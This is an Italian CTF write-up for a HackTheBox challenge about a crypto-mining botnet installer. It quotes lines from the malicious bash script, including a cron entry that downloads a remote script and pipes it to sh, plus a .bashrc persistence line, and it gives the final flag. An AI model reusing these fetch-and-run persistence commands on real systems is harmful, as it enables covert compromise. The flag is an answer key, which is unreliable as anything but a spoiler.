Descrizione

Nella corsa per Vitalium su Marte, il malvagio Consiglio di Arodor ricorse a misure disperate, avendo bisogno di fondi per i loro tentativi minerari. Hanno ideato una botnet creata appositamente per estrarre segretamente la criptovaluta. Ci siamo imbattuti in un campione del programma di installazione del minatore di Arodor sul nostro server. Riconoscendo la gravità della situazione, abbiamo avviato un’indagine approfondita. Con te come leader, devi svelare il funzionamento interno del meccanismo di installazione. La scoperta servì da punto di svolta, rivelando la portata della disperazione di Arodor. Tuttavia, la battaglia per Vitalium è continuata, spingendoci a rimanere vigili e ad adattare le nostre difese informatiche per contrastare le minacce future.

Ottieni le note sul certificato OSCP

Il corso pratico completo sul Penetration Testing delle applicazioni Web

La sfida mostra uno script bash molto lungo che contiene alcune stringhe con codifica base64 come quelle seguenti

url locale=”http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg==”

dest=$(echo “X3QwX200cnN9Cg==”|base64 -d)

echo “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64 -d >> /home/$USER/.bashrc

echo '* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1'

Tutto quello che dobbiamo fare è decodificare in base64 quelle stringhe e raccogliere le parti che compongono il flag finale.

$ eco cGFydDI9Il90aDMxcl93NHkiCg== | base64 -d

$ echo “X3QwX200cnN9Cg=="|base64 -d

$ echo “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64 -d

$ echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d

Bandiera finale

HTB{m1n1ng_th31r_w4y_t0_m4rs_th3_r3d_pl4n3t}

Playlist video dettagliate di HackTheBox

Circa l'autore

Creo note sulla sicurezza informatica, note di marketing digitale e corsi online. Fornisco anche consulenza di marketing digitale, inclusi ma non limitati a SEO, annunci Google e Meta e amministrazione CRM.

Visualizza articoli